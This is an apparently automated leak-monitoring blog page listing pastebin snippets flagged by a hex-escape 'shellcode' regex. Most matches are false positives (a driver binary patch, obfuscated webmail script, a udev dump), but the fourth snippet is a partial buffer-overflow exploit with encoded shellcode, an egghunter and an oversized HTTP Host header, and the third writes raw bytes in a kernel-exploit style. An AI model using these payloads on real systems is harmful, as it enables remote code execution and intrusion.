LeakedIn
Stories About Data Leaks and Related Stuff

Posts Tagged ‘Shellcode’

Potential leak of data: Shellcode

Detected 2 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:

sudo perl -pi -e '$c+=s/\x8b\x81\x1c\x0c\x00\x00\xeb\x06\x8b\x81\x20\x0c\x00\x00/\xb8\x02\x00\x00\x00\x90\xeb\x06\xb8\x00\x00\x00\x00\x90/; END { printf "%s: %d substitution%s made.\n",($c==1 ? "Success" : "Error"),$c,(!$c || $c>1 ? "s" : ""); $?=($c!=1); }' /System/Library/Extensions/GeForceGLDriverWeb.bundle/Contents/MacOS/libclh.dylib

Source: http://pastebin.com/raw.php?i=N4n7Ub0Q

Potential leak of data: Shellcode

Detected 4 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:

ion/mailclient/mailcom/resource/mailclient/widgets/blue/common/loading_animation_en-3447255655.gif"/\x3E\x3C/center\x3E',
      seuri:'\x31\x36\x31\x39\x30\x37\x35\x35\x37\x32\x36\x38\x37\x37\x38\x7C\x2D\x6C\x39\x43\x5F\x68\x46\x48\x36\x55\x63\x52\x79\x76\x6B\x64\x6E\x42\x64\x6E\x6D\x53\x6D\x42\x58\x69\x77',
      erMes:function(what){
        var a,c,d,e,f,r;
        a=what.split('{');r={};for(x=0;x<a.length;x++){c=a[x].replace(/{|}|"|\n/gi,'').split(',');if(c!=''&&c!=' '){for(y=0;y<c.length;y++){d=c[y].split(':');if(d!=''&&d!=' '){for(z=0;z

Source: http://pastebin.com/raw.php?i=KG94M4n9

Potential leak of data: Shellcode

Detected 1 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:

: 6px;
		border: 1px inset;
		width: 640px;
		height: 194px;
		text-align: left;
		overflow: auto">memcpy( (void*)0xx, (void*)&quot;\x5A\xFB\xFF\xFF&quot;, 4 );
		memcpy( (void*)0xx, (void*)&quot;\x05&quot;, 1 ); 
		memcpy( (void*)0xx, (void*)&quot;\xD8\x0F\x22\xD8\xC3\x0F\x20\xE0\x25\x7F\xFF\xFF\xFF\x0F\x22\xE0\x0D\x80&quot;, 18 );  
		memcpy( (void*)0xx, (void*)&quot;\xC3&quot;, 1 );  
		memcpy( (void*)0xx, (void*)&quot;\xC3&quot;, 1 );  //RtlPrefetchMemoryNonTemporal
		memcpy( (void*)0xx, (void*)&quot;\xBE\x6F\x00\x00&quot;, 4 );
		

Source: http://pastebin.com/raw.php?i=Ni63Etqs

Potential leak of data: Shellcode

Detected 62 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:

4"
"\x48\x6c\x47\x77\x6d\x53\x50\x79\x6f\x69\x45\x6f\x4b\x48\x70"
"\x4c\x75\x4f\x52\x63\x66\x32\x48\x6f\x56\x6c\x55\x6d\x6d\x6d"
"\x4d\x69\x6f\x39\x45\x65\x6c\x57\x76\x63\x4c\x47\x7a\x4d\x50"
"\x4b\x4b\x69\x70\x61\x65\x76\x65\x6d\x6b\x62\x67\x64\x53\x62"
"\x52\x62\x4f\x71\x7a\x55\x50\x52\x73\x39\x6f\x58\x55\x41\x41")


evilcrash = "\x4c"*3379 + "\x77\x21\x6e\x6c\x35\x6d"+ "G"*32 +egghunter + "A"*100 + ":7510"
buffer="GET /topology/homeBaseView HTTP/1.1\r\n"
buffer+="Host: "+evilcrash + "\r\n"
buffer+="Content-Type: application/x-www-form-urlencod

Source: http://pastie.org/pastes/7911603/download

Potential leak of data: Shellcode

Detected 2 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:

t4
  E: ID_FS_USAGE=filesystem
  E: ID_FS_UUID=7e8cae70-d536-4b7c-afca-28f4e7be65d2
  E: ID_FS_UUID_ENC=7e8cae70-d536-4b7c-afca-28f4e7be65d2
  E: ID_FS_VERSION=1.0
  E: ID_MODEL=SanDisk_SSD_U100_128GB
  E: ID_MODEL_ENC=SanDisk\x20SSD\x20U100\x20128GB\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
  E: ID_PART_ENTRY_DISK=8:0
  E: ID_PART_ENTRY_NUMBER=1
  E: ID_PART_ENTRY_OFFSET=2048
  E: ID_PART_ENTRY_SCHEME=dos
  E: ID_PART_ENTRY_SIZE=250066944
  E: ID_PART_ENTRY_TYPE=0x83
  E: ID_PART_TABLE_TYPE=dos
  E: ID

Source: http://pastebin.com/raw.php?i=WqqWdXB3